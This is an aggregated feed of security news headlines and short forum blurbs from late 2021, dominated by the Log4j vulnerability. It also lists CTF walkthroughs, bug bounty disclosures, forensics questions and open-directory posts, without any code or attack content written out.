    Common security issues when configuring HTTPs connections in Android
    submitted by /u/Masrepus [link] [comments]  ( 2 min )
    Android application testing using windows 11 and windows subsystem for android
    submitted by /u/0xdea [link] [comments]
    RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit
    submitted by /u/parsiya2 [link] [comments]  ( 4 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29639132 Points: 1 # Comments: 0  ( 6 min )
    What is the Log4j vulnerability and should I do anything to protect myself?
    Article URL: https://www.washingtonpost.com/technology/2021/12/20/log4j-hack-vulnerability-java/ Comments URL: https://news.ycombinator.com/item?id=29638820 Points: 2 # Comments: 0  ( 1 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
    Log4j vulnerability: what should boards be asking?
    Article URL: https://www.ncsc.gov.uk/blog-post/log4j-vulnerability-what-should-boards-be-asking Comments URL: https://news.ycombinator.com/item?id=29635047 Points: 1 # Comments: 0
    Is log4js-node affected by the log4s vulnerability? (no)
    Article URL: https://github.com/log4js-node/log4js-node/issues/1105 Comments URL: https://news.ycombinator.com/item?id=29632280 Points: 1 # Comments: 1  ( 3 min )
  • Open

    SecWiki News 2021-12-21 Review
    国外网络演习思考 by ourren CaptfEncoder: 一款跨平台网络安全工具套件 by guyoung 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Log4j: A forcing function to adopt long-overdue continuous security
    Are you prepared for the next big zero day exploit? Read what we learned from the Log4j crisis and what you can do to secure your assets with continuous AppSec. READ MORE  ( 4 min )
    Trends that underscore the seriousness of the cybersecurity skills gap
    It is no secret that there’s a glaring skills gap in cybersecurity. Learn more about the trends impacting AppSec success and the steps that can help bridge gaps in DevSecOps workflows. READ MORE  ( 6 min )
  • Open

    MCFE certification
    So I took the MCFE about 4 days ago, passed, and I haven't heard back from magnet about my certification. Should I contact someone or just wait a while longer? submitted by /u/bath_and_toaster [link] [comments]  ( 1 min )
    Need help on the state of and keywords for mobile device tracking in 1999
    Everybody look at their shelves and find books/software from 1999. Thank you for any pointers to books or sources. Not an attorney, just helping a friend doing life. Working up an appeal and several FOIA requests and searching for exact phrasing to use. What software/hardware/process existed in 1999 for any level of law enforcement to trace cell tower movements? Feds to state levels. Suspecting it was all tower techs as time permitted. Was any GPS data on a 2G flip worth looking at back in 1999? Looking for more than cell tower data in there maybe? Any specific references to law enforcement access to request tower pings, especially near Kentucky, 1999. (1999) My friend asked his attorneys to get the cell tower data and the lawyer contacted a tech that gave them a highly technical handwritten reply. This note was lost. Police did not produce cell data to place him at scene in a nearby state, KY. Suspect it was suppressed and it needs to be found as a purchase for software/training or Federal cooperation of some department that I am guessing at, like the FCC, FBI or the actual phone company. Thanks again! I am old school, OpenVMS VAX/Alphas ~Peace submitted by /u/OK_AquaFarmer [link] [comments]  ( 3 min )
  • Open

    CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter Fork with some improvements
    submitted by /u/v1brio [link] [comments]
    Powershell .Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploiter
    submitted by /u/v1brio [link] [comments]
  • Open

    物流巨头数据泄露、网络钓鱼攻击冒充辉瑞|12月21日全球网络安全热点
    美国塔尔萨市政府花费200万美元耗时8个月从勒索软件攻击中恢复过来。  ( 1 min )
    PyMICROPSIA:双尾蝎的新型信息窃取木马再度来袭
    近日,奇安信威胁情报中心红雨滴团队在日常的威胁狩猎中捕获了该组织以Python构建的攻击样本,该类样本最早由国外厂商发现并命名为PyMICROPSIA。  ( 1 min )
    云原生之Kubernetes安全
    随着越来越多企业开始上云的步伐,在攻防演练中常常碰到云相关的场景,例如:公有云、私有云、混合云、虚拟化集群等。  ( 3 min )
    DDoS和CC攻击原理(下)
    本文描述ddos和cc的防护机制。  ( 1 min )
    T-Mobile 今年已拦截210亿个诈骗电话,一半以上与车辆保修诈骗有关
    平均每月识别并拦截 18 亿个企图诈骗电话,也就是每秒 700 个企图诈骗电话!  ( 1 min )
    还能这样执行命令?命令执行绕过及防护规则研究
    命令执行绕过及防护规则研究  ( 1 min )
    黑客利用Log4Shell漏洞攻击比利时国防部
    比利时国防部遭到了网络攻击。
    Clop勒索软件团伙正在泄露英国警方机密数据
    Clop勒索软件团伙成功窃取了英国警方的机密数据,并在暗网上泄露。
    Log4j2远程代码执行漏洞检测和防护策略研究
    Log4j2漏洞已爆出有一段时间,关于如何修复该漏洞各大安全厂商也给出了相应的解决方案。
    ​零时科技 | DeFi平台Grim Finance攻击事件分析
    北京时间2021年12月19日,Grim Finance官方发推文称平台被外部攻击者利用,攻击者盗币价值超过3000万美元。  ( 1 min )
    探寻中国网安行业新兴力量 | 首届「网安新势力」大会筹备启动
    伴随「CIS 2021网络安全创新大会Spring·春日版」的召开,第一届「网安新势力」筹备工作正式启动。
    Meta对网络钓鱼攻击提起诉讼
    Meta正在对网络钓鱼攻击者和出于恶意目的滥用该平台的人,提起的一系列诉讼。  ( 1 min )
  • Open

    admin password disclosure via log file
    Acronis disclosed a bug submitted by darkdream: https://hackerone.com/reports/1121972 - Bounty: $100
    Log4j RCE on https://judge.me/reviews
    Judge.me disclosed a bug submitted by bhishma14: https://hackerone.com/reports/1427589 - Bounty: $50
  • Open

    USA Movies
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

    Custom Metasploit Module for Log4Shell Scanner
    In this article, we will discuss a customized Metasploit module I wrote for scanning applications vulnerable to Log4Shell as well as how… Continue reading on Medium »  ( 3 min )

  • Open

    Is it possible to encrypt my browsing data in a public wi-fi without using a VPN?
    I've been thinking a lot about this since recently a coffee shop near me opened, and it had open wifi. I do not want to pay for a VPN since I do not trust them for my data to show up as encrypted into the network. I found this on GitHub, but I have not tested it enough to see if it works. So can someone give any help with that? submitted by /u/ArturEPinheiro777 [link] [comments]  ( 2 min )
    Best Practices with Email DLP Exceptions
    Hey Guys, So we have our entire org covered with email DLP from O365, one of our vendors generally deals with sensitive data(social security numbers) and thus have requested to have a exception for them, what should be the best way to deal with it. Bypassing the entire DLP policy for an email ID although sounds easy but wanted to hear back some feedback on the best practices submitted by /u/w33ha_AD [link] [comments]  ( 1 min )
    I've read about multiple data breaches at US cell phone carriers (ex: AT&T, T-Mobile). Where is this data going? Is there a way I can see if my information is floating around and how widely it is distributed?
    Basically, these hacks are pretty significant and I'd like to know both the depth and breadth of what people know about my personal information. Inb4: It's all out there, I suppose it is, but I want to know the specifics, if only out of curiosity. Like, if one alpha hacker knows and doesn't share it with anybody, I'm probably good because I'm neither rich nor famous enough to really draw his or her attention. If it's out in the open for all to see, on the other hand, somebody might harass me. I use a Yubikey so I'm good there. Thank you! submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Owning Internal networks is way too easy, what could Microsoft do to improve the situation?
    It's more surprising when you don't get domain admin. So many things are broken, the terrible implementation of name resolution, machines caching login credentials, passing the hash, golden tickets, NTLM relay, IPv6, WPAD, the list goes on. Surely there must be a better way. What are some improvements you would like to see from Microsoft? submitted by /u/ImTheMaddest [link] [comments]  ( 6 min )
  • Open

    Intruding 5G SA core networks from outside and inside
    submitted by /u/sebazzen [link] [comments]
    OSS Getting Hammered for BigCorp Failures
    submitted by /u/GelosSnake [link] [comments]  ( 1 min )
    Inside a PBX - Discovering a Firmware Backdoor
    submitted by /u/RedTeamPentesting [link] [comments]  ( 1 min )
    letme.go - A minimalistic Meterpreter stager written in Go
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046)
    submitted by /u/ScottContini [link] [comments]  ( 1 min )
  • Open

    A Simple Geolocation Exercise
    In September 2020, British army paratroopers performed a joint training excise with Ukrainian armed forces as part of Exercise Joint… Continue reading on Medium »  ( 3 min )
    How Not to Get “Caught” — An OPSEC (Operational Security) Advice Aware Analysis of a Modern…
    Have you ever dreamed of getting “caught” and actually making the headlines with your latest research that also includes the digirally… Continue reading on Medium »  ( 4 min )
    Setting them Straight — 10 Years Back in the Future — A Brief Overview of the Hacker Scene Circa…
    Do you remember the hacker scene circa the 90s? Check out this brief analysis of the Scene up to present day back then. Keep reading. Continue reading on Medium »  ( 5 min )
  • Open

    An adorable twenty-seven second stop-motion video titled, "themonster.mov"
    submitted by /u/HGMIV926 [link] [comments]  ( 2 min )
    pictures of britain
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Betty's recipes.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Sharing my movie theme music collection
    submitted by /u/ercohn [link] [comments]  ( 1 min )
    X Files complete series 1080p (English and Spanish subs)
    submitted by /u/Skajuan [link] [comments]  ( 1 min )
  • Open

    Inverting PhotoDNA with Machine Learning
    submitted by /u/anishathalye [link] [comments]  ( 1 min )
    X-Ways handling of ad1 images
    Does X-Ways have an issue with ad images? I currently have at least 200 ad1 images from a 750gb disk unallocated space. I need to do data carving on the totality of the images. When doing “refine volume snapshot” one image at a time, I sometimes have files that do not really represent what I am searching for. For example, on one image I could carve 18 files, all mp3 files. These are not the files I am looking for. I am searching for doc/docx files that I know are there (we did live forensic before acquiring the hdd). What are your thoughts on this? submitted by /u/MisterTroubadour [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-20 Review
    SecWiki周刊(第407期) by ourren CIS 介绍(下)-CIS Benchmark&CIS 社区防御模型2.0 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Shellcode Generation with The Radare2 Framework
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    Log4j Vulnerability – What You Need to Know and How to Address Immediately
    Article URL: https://www.crestdatasys.com/blogs/log4j-vulnerability-what-you-need-to-know-and-how-to-address-immediately/ Comments URL: https://news.ycombinator.com/item?id=29622121 Points: 3 # Comments: 0  ( 4 min )
    Apache Log4j 2 vulnerability – Detection and fix simplified in your Java code
    Article URL: https://medium.com/@amitsoni4774/apache-log4j-2-vulnerability-detection-and-fix-simplified-in-your-java-code-9a6dd1d06796 Comments URL: https://news.ycombinator.com/item?id=29620987 Points: 2 # Comments: 0  ( 2 min )
  • Open

    Fuzzing
    Article URL: https://owasp.org/www-community/Fuzzing Comments URL: https://news.ycombinator.com/item?id=29620816 Points: 2 # Comments: 0  ( 4 min )

  • Open

    Moving my server sooo grab what you want. Super fast speeds TV/Music/Movies
    submitted by /u/Bryan2pointOh [link] [comments]  ( 1 min )
    What's your F***ing problem ?
    Hi everyone. I would like to talk about a subject that I consider abnormal. ​ First of all I would like to clarify that: ​ - I would like to apologize for this off topic - This post does not concern the 99% of OpenDirectories users, whom I also thank to keep this subreddit alive and for their work. - I would like to thank the moderation team, who do an excellent job. - I don't give a damn about karma points, my account can drop to -10,000, I don't care, it's just an "aesthetic feature". ​ There are times when some users post sites that they haven't thoroughly reviewed, and that's okay. In these publications, it happens that some content is illegal, immoral or whatever ... It is not the fault of the users who provided the link, it is something that happens. ​ But why, for cryi…  ( 4 min )
  • Open

    log4j — Getting to 2.16 and 2.17 is Only Critical If You Have Non-Default Logging Enabled
    submitted by /u/danielrm26 [link] [comments]  ( 2 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    All in One SEO Plugin Vulnerability Affects 3M Sites
    Article URL: https://www.searchenginejournal.com/all-in-one-seo-vulnerability-2021/430230/ Comments URL: https://news.ycombinator.com/item?id=29615935 Points: 1 # Comments: 0  ( 4 min )
    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29611871 Points: 2 # Comments: 0  ( 6 min )
    Deep Understanding of Commits for Automated Vulnerability Identification
    Article URL: https://sites.google.com/view/du-commits/ Comments URL: https://news.ycombinator.com/item?id=29611738 Points: 1 # Comments: 0  ( 1 min )
    Xcode 13.2 contains Log4j vulnerability
    Article URL: https://developer.apple.com/forums/thread/696785 Comments URL: https://news.ycombinator.com/item?id=29610913 Points: 181 # Comments: 41  ( 4 min )
  • Open

    GDB/Pedas Help
    I've set up GDB and Peda, and peda works fine except some commands require sudo. However, whenever I run GDB with sudo, it loads plain GDB without peda. I've edited the .gdbinit file as the instructions say. Any help would be appreciated. submitted by /u/Radiant-Midnight-278 [link] [comments]
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 1 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]  ( 1 min )
  • Open

    The Insidious Need for Speed
    “We need it yesterday. Speed kills. Coffee is for closers. First to market. If you’re in control, you’re not going fast enough.” Continue reading on Medium »  ( 4 min )
    OSINT CASE STUDY 1
    disclaimer: education purpose only Continue reading on Medium »  ( 2 min )
    Uncovering the hackers, who stole your Facebook account
    About 6-months ago I was sitting at my desk, working on my CS145 homework, when I heard a familiar ding, a new message on Facebook… Continue reading on Medium »  ( 4 min )
  • Open

    SecWiki News 2021-12-19 Review
    SPEL表达式注入漏洞深入分析 by ourren 基于异常行为检测CobaltStrike by ourren 基于规则向量化的HTTP资产识别方法探索 by ourren 浅谈被动式IAST产品与技术实现-代码实现Demo篇 by ourren 浅谈被动式IAST产品与技术实现-基础篇 by ourren Codeql 挖洞? by ourren 应急响应:没有痕迹该如何进行攻击溯源 by ourren 几款小众而实用的远控软件 by ourren iMessage 零点击漏洞利用细节公开 by ourren ACSAC 2021 论文录用列表 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    digital world.local: Vengeance Vulnhub Walkthrough
    Donavan’s VENGEANCE (digitalworld.local: VENGEANCE) is a medium level machine designed for Vulnhub. This lab includes a difficult exploitation procedure that is suitable for those experienced The post digital world.local: Vengeance Vulnhub Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Unauthorized access to choice.av.ru control panel
    Azbuka Vkusa disclosed a bug submitted by wocat: https://hackerone.com/reports/963161 - Bounty: $100
    Open redirect (DOM-based) on av.ru via "return_url" parameter (Login form)
    Azbuka Vkusa disclosed a bug submitted by zophi: https://hackerone.com/reports/958864 - Bounty: $100
    Dependency repository hijacking aka Repo Jacking from GitHub repo rubygems/bundler-site & rubygems/bundler.github.io + bundler.io docs
    RubyGems disclosed a bug submitted by akincibor: https://hackerone.com/reports/1430405

  • Open

    Log4j 2.17.0 released, for third CVE (CVE-20 21-45105)
    Article URL: https://logging.apache.org/log4j/2.x/index.html Comments URL: https://news.ycombinator.com/item?id=29609578 Points: 3 # Comments: 2  ( 5 min )
    Third High Severity CVE in Log4j Is Published
    Article URL: https://logging.apache.org/log4j/2.x/security.html Comments URL: https://news.ycombinator.com/item?id=29604097 Points: 430 # Comments: 306  ( 11 min )
  • Open

    Patch fixing critical Log4j 0-day has its own vulnerability that’s under exploit
    Article URL: https://arstechnica.com/information-technology/2021/12/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=29609295 Points: 2 # Comments: 0  ( 3 min )
    Apache Log4j Vulnerability Webinar – What You Need to Know
    Article URL: https://www.criticalinsight.com/resources/news/article/apache-log4j-vulnerability-webinar-what-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=29608959 Points: 1 # Comments: 0  ( 2 min )
  • Open

    How.It.Made
    submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    A few directories with small amount of music
    Index of /stuff/mp3/amd (audio.msk.ru) Index of /music/funk (czyborra.com) Index of /files (rarekindrecords.co.uk) Index of /audio/ (martindoyleflutes.com) (music from an irish flute player) Index of /files/mp3 (saparov.ru) Index of /albums/4151 (soton.ac.uk) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Want to know some line-dancing moves? Here's some PDFs that show you some dance steps.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    Reasons to go looking in the Registry
    Chris Sanders tweeted out an interesting pair of questions recently, and the simple fact is that for me to fully answer the question, the tweet thread would be just too extensive. The questions were: What are the most common reasons you go looking in the Windows registry? What do you use it to prove most? Like almost everything else in DFIR, my response to the both questions is, it depends. Why? Well, it depends upon the goals of your investigation. What I use the Registry to prove depends heavily on what I'm trying to prove, or to disprove. This may sound pretty obvious, and even intuitive, but far too often in DFIR, we can find ourselves far too easily chasing down rabbit holes that have little, if anything, to do with our investigative goals. Configuration The Windows Registry holds a g…  ( 7 min )
  • Open

    Preferred method of collecting folders or loose documents on Macs ?
    I'm using Sumuri Recon and looking through the features but it seems to be an all or nothing product (imaging the entire disk/volume. This is not confirmed by any means. I haven't spent enough time with Sumuri but It doesn't appear to allow for Collection of specific folders. Anyone here have experience with small targeted forensic sound collections on Macs. The hardware dongle makes this a small painpoint as it would be nice to remotely preserve a few documents in a defensible manner. This is very simple when dealing with Windows devices where FTK imager can be installed and executed within seconds. Anyone aware of a Mac APFS equivalent? This particular remote MacBook pro is on Catalina (APFS) and I have all the keys to the castle. I'm not as interested in preserving extended Metadata as I am in the plain created and modified date. Perhaps a zipping solution that preserves these two dates? submitted by /u/zero-skill-samus [link] [comments]  ( 1 min )
    How does forensic imaging of locked cellular devices work?
    I've been looking into mobile forensics and I've realized that everything I come across pertaining to imaging a filesystem starts with "Unlock the device". This doesn't quite make sense to me, because if an LEO gets a warrant to search a phone, the owner obviously doesn't have to tell them/enter the password. And from what I can tell, the only way to really "get" the password starts off with imaging the filesystem/creating a backup. Am I missing something? submitted by /u/Fusiondew [link] [comments]  ( 4 min )
    CCTV went down
    Hello to all forensicators, We have a weird situation where about 20 of our CCTVs just stopped recording. One of our external vendors was running a VAPT test on the vlan containing the cameras at the same time they went down. The CCTV logs show us that XSS and SQL injection attacks were being run on the cameras. Checking the application log tells us the time when the cameras stopped recording and the time they got back online. However I am unable to figure out what was the exact attack that brought down the cameras. What logs should I be looking at to figure this out? submitted by /u/indianadmin [link] [comments]  ( 1 min )
    VPN data exfiltration
    A colleague of mine was referencing someone using a Kali Linux USB drive on a windows 10 machine and connecting to a VPN. They believe the individual was pushing business related data through the VPN that was unauthorized. Is there anything forensically that one could look for on what might have gone outbound on the EO1? submitted by /u/WhoAteTheLastCookie [link] [comments]  ( 2 min )
  • Open

    A Detailed Guide on Log4J Penetration Testing
    In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the The post A Detailed Guide on Log4J Penetration Testing appeared first on Hacking Articles.  ( 8 min )
  • Open

    SecWiki News 2021-12-18 Review
    CVE-2016-7124反序列化漏洞复现 by SecIN社区 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    HackMyVM — Forbidden
    Writeup (Español) Continue reading on Medium »  ( 3 min )
    Should You Trust Your Admin Tools?
    No, not really Continue reading on Medium »  ( 4 min )
  • Open

    Stored XSS on 1.4.0
    ImpressCMS disclosed a bug submitted by tehwinsam: https://hackerone.com/reports/1331281
    HTML injection in email content during registration via FirstName/LastName parameter
    MTN Group disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1256496
    Flickr Account Takeover using AWS Cognito API
    Flickr disclosed a bug submitted by lauritz: https://hackerone.com/reports/1342088 - Bounty: $7550
  • Open

    Alternative Process Injection
    submitted by /u/dmchell [link] [comments]
  • Open

    lurch1317: A new pidgin plugin with strong crypto for deniablity (WIP)
    submitted by /u/hardenedvault [link] [comments]  ( 1 min )
    Log4j version 2.17.0 fixes a new problem CVE-2021-45105 DoS vuln (CVSS score of 7.5)
    submitted by /u/ScottContini [link] [comments]  ( 2 min )
  • Open

    [Day 16] OSINT Ransomware Madness | Advent of Cyber 3 (2021)
    OSINT stands for Open Source Intelligence, information that can be obtained from free and public sources. Offensive teams commonly use… Continue reading on Medium »  ( 3 min )

  • Open

    Threat Intelligence on Log4j CVE: Key Findings and Their Implications
    Article URL: https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications Comments URL: https://news.ycombinator.com/item?id=29599546 Points: 1 # Comments: 0  ( 6 min )
    Security in context: When is a CVE not a CVE?
    Article URL: https://snyk.io/blog/when-is-a-cve-not-a-cve/ Comments URL: https://news.ycombinator.com/item?id=29589692 Points: 2 # Comments: 0  ( 5 min )
    Bypass of allowedLdapHost check in Log4j 2.15.0 – Log4Shell (CVE-2021-44228)
    Article URL: https://twitter.com/marcioalm/status/1471740771581652995 Comments URL: https://news.ycombinator.com/item?id=29588947 Points: 3 # Comments: 1  ( 1 min )
    Risk analysis of Log4Shell (CVE-2021-44228) and mitigation
    Article URL: https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html Comments URL: https://news.ycombinator.com/item?id=29587870 Points: 1 # Comments: 0  ( 4 min )
  • Open

    If You're Not Doing Continuous Asset Management You're Not Doing Security
    submitted by /u/danielrm26 [link] [comments]  ( 3 min )
    Fail2ban / Regexp rule against LOG4J vuln
    submitted by /u/AGS42 [link] [comments]
    Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (with payload)
    submitted by /u/freeqaz [link] [comments]  ( 2 min )
  • Open

    A website's gone
    What happened to the.eye? Is it dead, dead or is there a second website? Also, the link to the discord that the automod gave me was invalid. submitted by /u/Sleepingpiranha [link] [comments]  ( 2 min )
    A large collection of indiscriminately-named mp3 music.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Sparks albums
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    html injection at judge.me
    Judge.me disclosed a bug submitted by 0xteles: https://hackerone.com/reports/1036995
    Reflected Cross-Site Scripting/HTML Injection
    Informatica disclosed a bug submitted by jak0_: https://hackerone.com/reports/1379158
  • Open

    SecWiki News 2021-12-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    CALDERA
    Hey everyone, Does anyone here use or have used CALDERA? A small question regarding initial access; Are we meant to deploy an agent locally then do lateral movement within the network to reach another target machines? Thank you! submitted by /u/lifeislemon_not_cake [link] [comments]  ( 1 min )
  • Open

    Extract sms messages from Google Backup? Cellebrite failed on Android/Samsung
    I've tried using Cellebrite Cloud to extract messages from a Google drive Android backup (Android sends Google backups to Google Drive). It failed to parse after running several tests using my own device. I also tried to access my Samsung backup which includes messages. Celkebrite Cloud failed to login at all. Has anyone had any success accessing or extracting sms from Android Google backups or Samsung backups? It's unfortunate when tools provide that service yet fail to perform. submitted by /u/zero-skill-samus [link] [comments]  ( 2 min )

  • Open

    CHFI 2021 Exam Review
    As some of you may know, CHFI is considered to be the base line of computer forensics certifications which is why I thought that buying a test and course from EC-Council would be the place to start. I will lay out the topics that I was NOT expecting to get tested on. Let me preface by saying that there is NO one study guide out there that will prepare you for your test. You will hear people saying "I didn't study and still passed/I studied for two weeks and passed." Unless, you've worked as a SOC Analyst or have 2 years of prior computer forensics, you will fail. I began studying in January of this year and took the test in October. I failed with a 57%. While you need a 75%~ to pass, there are things the EC-Council test prep package did NOT prepare me for and the only reason why I got…  ( 4 min )
    SUMURI RECON ITR now has the ability to physically image M1, M1 Max, and M1 Pro Mac computer
    submitted by /u/acw750 [link] [comments]  ( 1 min )
    Detecting RAID parameters for rebuild
    Hi all, I have 3 E01 raid discs from a QNAP device, which i try to rebuild. X-ways , OS forenics and mdadm don't recognize the raid parameters automatically. So the day is finally come to learn more about raid.... Is here somebody who can point me out to some good reading on how to extract these parameters from the discs? Thanks in advance! submitted by /u/Lizzy4235 [link] [comments]  ( 1 min )
  • Open

    Google storage bucket takeover which is used to load JS file in dashboard.html in "github.com/kubernetes/release" which can lead to XSS
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398706 - Bounty: $100
    Race Condition Vulnerability when creating profiles
    Showmax disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1428690
    Able to access private picture/video/writing when requesting for their JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1424291 - Bounty: $250
    Broken Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398572 - Bounty: $100
    Broken Github Link Used in deployment docs of "github.com/kubernetes/kompose"
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398617 - Bounty: $100
  • Open

    digital world.local: FALL Vulnhub Walkthrough
    FALL (digitalworld.local: FALL) is a medium level machine created by Donavan for Vulnhub. This lab is appropriate for some experienced CTF players who wish to The post digital world.local: FALL Vulnhub Walkthrough appeared first on Hacking Articles.  ( 5 min )
    Thales1 Vulnhub Walkthrough
    “Thales” is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to The post Thales1 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Forgiveness
    I forgive you for your first lies. I forgive myself for believing into it. Continue reading on Medium »  ( 1 min )
  • Open

    Mitigating the Log4Shell vulnerability (CVE-2021-44228) on DietPi
    Article URL: https://dietpi.com/blog/?p=1172 Comments URL: https://news.ycombinator.com/item?id=29581625 Points: 2 # Comments: 0  ( 5 min )
    Securing K8s clusters for Log4j CVE-2021-44228
    Article URL: https://github.com/kubearmor/log4j-CVE-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29573520 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Old programs for WIN & MAC (Office 95, Encarta, iLife, etc) and ISOs
    Aux francais mostly http://145.239.62.120/download_center/repos/Applications/ http://145.239.62.120/download_center/repos/ISOs/ submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-16 Review
    Log4j2远程代码执行漏洞检测和防护策略研究 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Nighthawk 0.1 - New Beginnings - @MDSecLabs
    submitted by /u/dmchell [link] [comments]  ( 1 min )

  • Open

    Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    My road map !! Need help
    This isy roadmap to be a red teamer Is anything need to change 1- learn programming ---python ---C/C++ 2-Networking and OS ---Linux ---IT and Networking Basics ---THM Pre security path 3-Web Security ---THM Web fundamentals path ---OWASP TOP 10 Guide 4-Hacking Basics ---THM Complete beginner path ---INE PTS Course ---THM jr penetration tester path 5- Doing CTFs ---THM ---Hack the box ---Velnhub 6-The OSCP 7-Red team Certs ---pentester academy CRTP ---pentester academy CRTE ---Offensive security OSCE ---NOTES--- I am a computer science student I have learned C++ and python scripting And linux command line submitted by /u/Ok_Attempt_3411 [link] [comments]  ( 2 min )
    Guys, does anyone knows anything about 7asecurity.com course content?
    Guys, does anyone knows anything about 7asecurity.com course content? submitted by /u/Select_Plane_1073 [link] [comments]  ( 1 min )
  • Open

    Windows Credential Manager for hackers
    Windows can store credentials for easy reuse. There are several ways to access them. Continue reading on System Weakness »  ( 3 min )
    Runas for hackers
    Please, refer to the post on Credential Manager if you are interested in seeing how to manage stored credentials in windows. This will be… Continue reading on System Weakness »  ( 4 min )
    HackMyVM — Twisted
    Writeup (Español) Continue reading on Medium »  ( 2 min )
  • Open

    Hot-patch CVE-2021-44228 by exploiting the vulnerability itself
    Article URL: https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch Comments URL: https://news.ycombinator.com/item?id=29571694 Points: 1 # Comments: 0  ( 1 min )
    Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE)
    Article URL: https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ Comments URL: https://news.ycombinator.com/item?id=29569587 Points: 2 # Comments: 0  ( 10 min )
    Protection against CVE-2021-45046, the additional Log4j RCE vulnerability
    Article URL: https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29568125 Points: 3 # Comments: 0
    Log4j Vulnerability (CVE-2021-44228)
    Article URL: https://github.com/NCSC-NL/log4shell Comments URL: https://news.ycombinator.com/item?id=29563247 Points: 2 # Comments: 0  ( 3 min )
    Google Chrome Zero Day CVE-2021-4102, Use after free in V8
    Article URL: https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html Comments URL: https://news.ycombinator.com/item?id=29561740 Points: 82 # Comments: 27  ( 6 min )
  • Open

    Weak rate limit could lead to ATO due to weak password protection mechanisms
    Reddit disclosed a bug submitted by bombon: https://hackerone.com/reports/1065186 - Bounty: $100
    No rate limit on password reset leads to email enumeration at gateway-production.dubsmash.com
